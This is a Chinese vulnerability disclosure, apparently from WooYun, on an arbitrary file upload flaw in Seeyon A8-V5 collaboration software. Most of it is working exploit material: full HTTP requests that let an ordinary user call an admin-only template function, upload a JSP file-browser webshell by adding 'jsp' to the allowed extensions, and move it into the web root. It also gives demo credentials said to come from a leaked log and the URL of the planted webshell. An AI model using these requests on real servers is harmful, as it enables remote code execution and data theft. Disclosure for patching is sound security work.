致远A8-V5协同管理软件普通用户任意文件上传(通杀V5)

### 简要描述： 这几天一直在琢磨致远A8-V5，昨天发现几个小问题，今天进一步挖掘到任意文件上传漏洞。 ### 详细说明： 致远A8-V5协同管理软件允许普通用户调用本属于system·权限的功能【登陆页模板管理】，虽然不能利用浏览器直接访问该功能，提示权限不足，但是直接发送数据包即可成功。 致远A8-V5协同管理软件充分的考虑了上传文件所带来的危险，全系统都采用上传文件缓存到web目录以外，不能直接获取webshell。但利用【登陆页模板管理】处的文件缓存迁移到web目录功能即可获取webshell。 ### 漏洞证明： 演示地址： http://a8v51.seeyon.com/ 演示账户：scyd/123456，泄露的log中获取到的。 步骤： 1.利用合法会话获取模板的ID 2.突破限制上传jsp可执行文件 3.利用动态迁移技术将缓存到web目录以外的文件迁移到web任意目录 证明开始： 1.利用合法会话获取模板的ID request： ``` POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList Accept-Language: zh-cn Proxy-Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: a8v51.seeyon.com Content-Length: 74 DNT: 1 Pragma: no-cache Cookie: JSESSIONID=4DD87116B4082E92D03F5BB3F7F0C56F; loginPageURL="/main.do"; avatarImageUrl=8469117046183055270; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849; Hm_lpvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849 managerMethod=selectTemplateById&arguments=["2676694155142778633"] ``` response： ``` {"name":"登录页-单图片式","path":"default\/login.jsp","description":"单图片式，极简风格","updateTime":"2014-12-22 00:00","sort":"1","preset":1,"updateUser":"8469117046183055270","cdefault":0,"thumbnail":"default\/thumbnail.png","id":"2676694155142778633","new":false,"extraMap":{}} ``` 此处需要记录response中的参数id的值2676694155142778633 2.突破限制上传jsp可执行文件 需要修改原始post请求中的extensions，在“jpg,jpeg,gif,bmp,png”后添加jsp;修改filename的文件名由.jsg改为.jsp 修改后request如下： ``` POST /seeyon/fileUpload.do?method=processUpload HTTP/1.0 Accept: text/html, application/xhtml+xml, */* Referer: http://a8v51.seeyon.com/seeyon/fileUpload.do?type=&firstSave=true&applicationCategory=1&extensions=jpg,jpeg,gif,bmp,png&quantity=1&isEncrypt=false&attachmentTrId=poi3&callMethod=uploadCallBack2&maxSize=2097152&takeOver=true&_isModalDialog=true Accept-Language: zh-CN User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Type: multipart/form-data; boundary=---------------------------7ded626340460 Proxy-Connection: Keep-Alive Pragma: no-cache Content-Length: 76766 DNT: 1 Host: a8v51.seeyon.com Cookie: JSESSIONID=3385E1567ED6D100FD461F2299761286; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752 -----------------------------7ded626340460 Content-Disposition: form-data; name="type" -----------------------------7ded626340460 Content-Disposition: form-data; name="extensions" jpg,jpeg,gif,bmp,png,jsp -----------------------------7ded626340460 Content-Disposition: form-data; name="applicationCategory" 1 -----------------------------7ded626340460 Content-Disposition: form-data; name="destDirectory" -----------------------------7ded626340460 Content-Disposition: form-data; name="destFilename" -----------------------------7ded626340460 Content-Disposition: form-data; name="maxSize" 2097152 -----------------------------7ded626340460 Content-Disposition: form-data; name="isEncrypt" false -----------------------------7ded626340460 Content-Disposition: form-data; name="callMethod" uploadCallBack2 -----------------------------7ded626340460 Content-Disposition: form-data; name="attachmentTrId" poi3 -----------------------------7ded626340460 Content-Disposition: form-data; name="firstSave" true -----------------------------7ded626340460 Content-Disposition: form-data; name="takeOver" true -----------------------------7ded626340460 Content-Disposition: form-data; name="file1"; filename="wooyun.jsp" Content-Type: text/plain <%-- jsp File browser 1.2 --%> -----------------------------7ded626340460-- ``` 在response中查找".jsp" [<img src="https://images.seebug.org/upload/201412/23101408ce158da6b12a96d463e107322602be91.png" alt="00.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/23101408ce158da6b12a96d463e107322602be91.png) 记录 ``` fileurls=fileurls+","+'-4028755744185366901'; ``` 中的值”-4028755744185366901“ 3.利用动态迁移技术将缓存到web目录以外的文件迁移到web任意目录 先看看源代码是怎么写的 ``` if ("1".equals(hotSpotType)) { String picFileId = (String)params.get("picFileId" + i); if ((picFileId != null) && (picFileId.trim().length() > 0)) { File uploadedFile = this.fileManager.getFile(Long.valueOf(Long.parseLong(picFileId)), new Date()); try { String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length()); FileCopyUtils.copy(uploadedFile, new File(Template_Parent_Path + targetUrl)); this.fileSynchronization.copy(new FileInputStream(uploadedFile), "main/login/" + targetUrl); hotspot.setHotspotvalue(targetUrl); } catch (IOException e) { throw new BusinessException("存放图片文件出错：" + e); } } } ``` 成功的关键是需要两个参数，一个是picFileId，一个是targetUrl 好了，在此次演示中 picFileId的值为步骤二里面的-4028755744185366901 targetUrl= ``` String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length()); ``` picFileId 已知 hotspotvalue可以自定义 被自定义的位置为最后一行，步骤一中得到的id如果不同，需要替换下面的id为步骤一中的id request如下: ``` POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321 HTTP/1.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList Accept-Language: zh-cn Proxy-Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: a8v51.seeyon.com Content-Length: 5255 DNT: 1 Pragma: no-cache Cookie: JSESSIONID=31BEBA9DAA457E8E8280E97175FD4DBB; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752 managerMethod=transSaveTemplate&arguments=[{"id":"2676694155142778633","entityLevel":"system","entityId":"-1730833917365171641","name":"登录页-单图片式","description":"å•å›¾ç‰‡å¼ï¼Œæžç®€é£Žæ ¼","sort":"1","path":"default/login.jsp","hotSpotsCount":"8","hotSpotId0":"1186536015593226561","hotSpotType0":"0","templateId0":"2676694155142778633","hotspotkey0":"note","description0":"","entityId0":"-1730833917365171641","entityLevel0":"System","hotspotName0":"hotspot.name.note","hotspotModule0":"0","hotspotSort0":"0","hotspotRead0":"0","showdisplay0":"0","hotAccountId0":"-1730833917365171641","hotspotvalue0":"致远A8-V5协同管理软件","hotSpotId1":"-2858574230077355948","hotSpotType1":"0","templateId1":"2676694155142778633","hotspotkey1":"note","description1":"","entityId1":"-1730833917365171641","entityLevel1":"System","hotspotName1":"hotspot.name.note","hotspotModule1":"0","hotspotSort1":"0","hotspotRead1":"0","showdisplay1":"0","hotAccountId1":"-1730833917365171641","hotspotvalue1":"致远A8-V5协同管理软件","hotSpotId2":"-6590619288520733107","hotSpotType2":"1","templateId2":"2676694155142778633","hotspotkey2":"contentbgi","description2":"","entityId2":"-1730833917365171641","entityLevel2":"System,Account","hotspotName2":"hotspot.name.loginpic","hotspotModule2":"0","hotspotSort2":"1","hotspotRead2":"0","showdisplay2":"0","hotAccountId2":"-1730833917365171641","picFileId2":"","hotspotvalue2":"default/images/main_content_ie6.jpg","hotSpotId3":"-151221304857771845","hotSpotType3":"1","templateId3":"2676694155142778633","hotspotkey3":"contentbgi","description3":"","entityId3":"-1730833917365171641","entityLevel3":"System,Account","hotspotName3":"hotspot.name.loginpic","hotspotModule3":"0","hotspotSort3":"1","hotspotRead3":"0","showdisplay3":"0","hotAccountId3":"-1730833917365171641","picFileId3":"","hotspotvalue3":"default/images/main_content_ie6.jpg","hotSpotId4":"-8315917587715897900","hotSpotType4":"2","templateId4":"2676694155142778633","hotspotkey4":"mainbgc","description4":"","entityId4":"-1730833917365171641","entityLevel4":"System,Account","hotspotName4":"hotspot.name.mainbgc","hotspotModule4":"0","hotspotSort4":"2","hotspotRead4":"0","showdisplay4":"0","hotAccountId4":"-1730833917365171641","hotspotvalue4":"#fafafa","hotSpotId5":"7763739069174663407","hotSpotType5":"2","templateId5":"2676694155142778633","hotspotkey5":"mainbgc","description5":"","entityId5":"-1730833917365171641","entityLevel5":"System,Account","hotspotName5":"hotspot.name.mainbgc","hotspotModule5":"0","hotspotSort5":"2","hotspotRead5":"0","showdisplay5":"0","hotAccountId5":"-1730833917365171641","hotspotvalue5":"#fafafa","hotSpotId6":"5768369956880141892","hotSpotType6":"1","templateId6":"2676694155142778633","hotspotkey6":"mainbgi","description6":"","entityId6":"-1730833917365171641","entityLevel6":"System","hotspotName6":"hotspot.name.mainbgi","hotspotModule6":"0","hotspotSort6":"3","hotspotRead6":"0","showdisplay6":"0","hotAccountId6":"-1730833917365171641","picFileId6":"","hotspotvalue6":"default/images/main_bg.png","hotspotTiling6":"1","hotSpotId7":"-3488186128041623434","hotSpotType7":"1","templateId7":"2676694155142778633","hotspotkey7":"mainbgi","description7":"","entityId7":"-1730833917365171641","entityLevel7":"System","hotspotName7":"hotspot.name.mainbgi","hotspotModule7":"0","hotspotSort7":"3","hotspotRead7":"0","showdisplay7":"0","hotAccountId7":"-1730833917365171641","picFileId7":"-4028755744185366901","hotspotvalue7":"default/-4028755744185366901.jsp","hotspotTiling7":"1"}] ``` response响应为null即可成功，此处将存储到非web目录的缓存文件迁移到了web目录 webshell地址 ``` http://a8v51.seeyon.com/seeyon/main/login/default/-4028755744185366901.jsp ``` 【【【【【【注意删不掉】】】】】】 【【【【【【不是我不删】】】】】】